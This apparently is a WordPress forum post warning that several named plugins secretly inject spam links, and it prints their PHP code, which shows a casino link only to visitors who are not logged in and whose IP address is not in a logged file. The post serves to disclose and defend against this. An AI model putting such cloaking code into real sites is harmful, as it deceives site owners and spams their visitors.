Actually no one hacked into your site the way you might think – the spam links are created by a malicious WordPress plugins you downloaded directly from www.ads-software.com. The spammer just keeps creating new plugins after they get banned. Defintely a flaw in the way WordPress offer plugins to users…
The following plugins are known to be linked to the spammer;
seo-cheese
return-to-top
g-translate (note the hyphen – other versions are fine)
seo-interlinking
google-maps-by-daniel-martyn
If you have installed any of these plugins they should be removed immediately as they are all produced by the same hacker. They all insert dodgy links into the top of your site.
Malicious code (this is normally found in setup.php or install.php)
<?php
if (is_user_logged_in()) { $loggedin = 'yes'; } else { $loggedin = 'no'; }
if ($loggedin == 'no') {
$ip = $_SERVER['REMOTE_ADDR'];
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/seo-cheese/created.txt';
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring= $contents;
$findme = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
?>
<p align="center"><a href="https://online-casino.blog.ca">https://online-casino.blog.ca</a></p>
<?php //
} else {
echo '';
}}
?>
The following sites are linked to the same hacker and listing them here will hopefully help other people who have the same issue.
[ Thanks but please do not post spammy links like that on these forums ]
The trick works well because the link itself is not visible to the site owner as firstly, it doesn’t show if you are logged in to your own site, and secondly it also keeps a log of all past IP addresses that successfully logged in before and hides the link to any recorded IP addresses.
